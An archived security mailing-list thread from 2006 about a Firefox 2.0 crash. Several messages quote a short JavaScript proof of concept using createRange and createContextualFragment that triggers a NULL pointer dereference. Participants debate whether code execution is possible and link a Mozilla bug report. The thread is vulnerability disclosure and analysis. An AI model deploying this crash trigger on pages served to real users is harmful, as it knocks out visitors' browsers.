Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-27 Thread sflist 
Also crashes Seamonkey 1.1b on Suse 10.1

>
>
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
>   
>   function do_crash() { var 
> range;
>
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
> 
> 
> 
> Good bye Firefox!
> 
> 
>


-- 
"Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jan Heisterkamp 

[EMAIL PROTECTED] schrieb:

New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}



Good bye Firefox!



  

hi!
that works also under firefox v1.5.0.7.
regards
jan

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jerome Athias 

3APA3A a écrit :

Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.

  

Hi,

you should be interested by this
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

+ a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA

Re[2]: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-03 Thread 3APA3A 
Dear Jerome Athias,

I  said  NULL pointer is not exploitable _by itself_. Ability to control
unhandled  exception  filter is different vulnerability. NULL pointer in
this case is not exploitation vector, it's only used to initiate attack.

--Thursday, November 2, 2006, 10:01:19 PM, you wrote to [EMAIL PROTECTED]:

JA> 3APA3A a écrit :
>> Dear [EMAIL PROTECTED],
>>
>> NULL pointer dereference is not exploitable to code execution by itself.
>>
>>   
JA> Hi,

JA> you should be interested by this
JA> http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

JA> + a little tool
JA> https://www.securinfos.info/outils-securite-hacking/uSEH.rar

JA> /JA



-- 
~/ZARAZA
Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü.  (Òâåí)

Re[3]: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-01 Thread 3APA3A 
Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.
Please read carefully original Michal Zalewski post on the issue you are
pointing
http://securitytracker.com/alerts/2006/Apr/1016001.html

issue  mentioned  is not NULL pointer, but NULL+offset dereference where
offset is believed to be controlled:

-=-=-=-=- start quote Michal Zalewski =-=-=-=-

...this will (usually) cause a NULL pointer + fixed offset (eax+0x28)
dereference in mshtml.dll, the pointer being read from allocated but still
zeroed memory region.

The aforementioned condition is not exploitable, but padding the page with
preceeding OBJECT tag (and other tags), increasing the number of nested
OBJECTs, and most importantly, adding bogus 'type=' parameters of various
length to the final sequence of OBJECTs, will cause that dereference to
become non-NULL on many installations;

-=-=-=-=-  end quote  =-=-=-=-



--Tuesday, October 31, 2006, 11:00:00 PM, you wrote to 
bugtraq@securityfocus.com:

xgc> When you have a NULL pointer dereference a code execution is
xgc> also possible, so you can't exclude it at all.
xgc> For example in this old flaw:
xgc> http://securitytracker.com/alerts/2006/Apr/1016001.html
xgc> "The browser does not properly process certain combinations
xgc> of nested OBJECT tags. A remote user can create specially crafted
xgc> HTML that, when loaded by the target user, will trigger a NULL
xgc> pointer dereference and cause the target user's browser to crash or
xgc> execute arbitrary code."
 


-- 
~/ZARAZA
http://www.security.nnov.ru/

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-01 Thread Daniel Veditz 
[EMAIL PROTECTED] wrote:
> When you have a NULL pointer dereference a code execution is also possible, 
> so you can't exclude it at all.
> For example in this old flaw:
> http://securitytracker.com/alerts/2006/Apr/1016001.html

In that example there was a way to influence the crash so that it was not null.
The Metasploit blog previously reported on a way to use a null dereference crash
to trigger a vulnerability in the windows SEH to run code (since fixed, and not
exploitable via Firefox as far as anyone can tell).

Neither of those conditions apply here, it's just a null dereference. In a debug
build you get

###!!! ASSERTION: Parsing didn't create a parser context?: 'mParserContext',
file c:/dev/ff2/mozilla/parser/htmlparser/src/nsParser.cpp, line 1882

This bug appears to have been fixed in the code that will become Firefox 3. This
crash is being tracked at https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread xxxx 
When you have a NULL pointer dereference a code execution is also possible, so 
you can't exclude it at all.
For example in this old flaw:
http://securitytracker.com/alerts/2006/Apr/1016001.html
"The browser does not properly process certain combinations of nested OBJECT 
tags. A remote user can create specially crafted HTML that, when loaded by the 
target user, will trigger a NULL pointer dereference and cause the target 
user's browser to crash or execute arbitrary code."

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread Josh Bressers 
> New Flaw in Firefox 2.0: DoS and possible remote code execution
> 
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
> 

This looks like a NULL pointer dereference in my debugger.  Do you have
evidence to call this remote code execution?

-- 
JB

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread Gouki 
Firefox 1.5.0.7 is also vulnerable (to DoS at least).

On Tue, 2006-10-31 at 09:24 +, [EMAIL PROTECTED] wrote:
> New Flaw in Firefox 2.0: DoS and possible remote code execution
> 
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
> 
> 
> 
> 
> 
> function do_crash()
> {
> var range;
> 
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
> 
> 
> 
> Good bye Firefox!
> 
> 


signature.asc
Description: This is a digitally signed message part

New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread xxxx 
New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}



Good bye Firefox!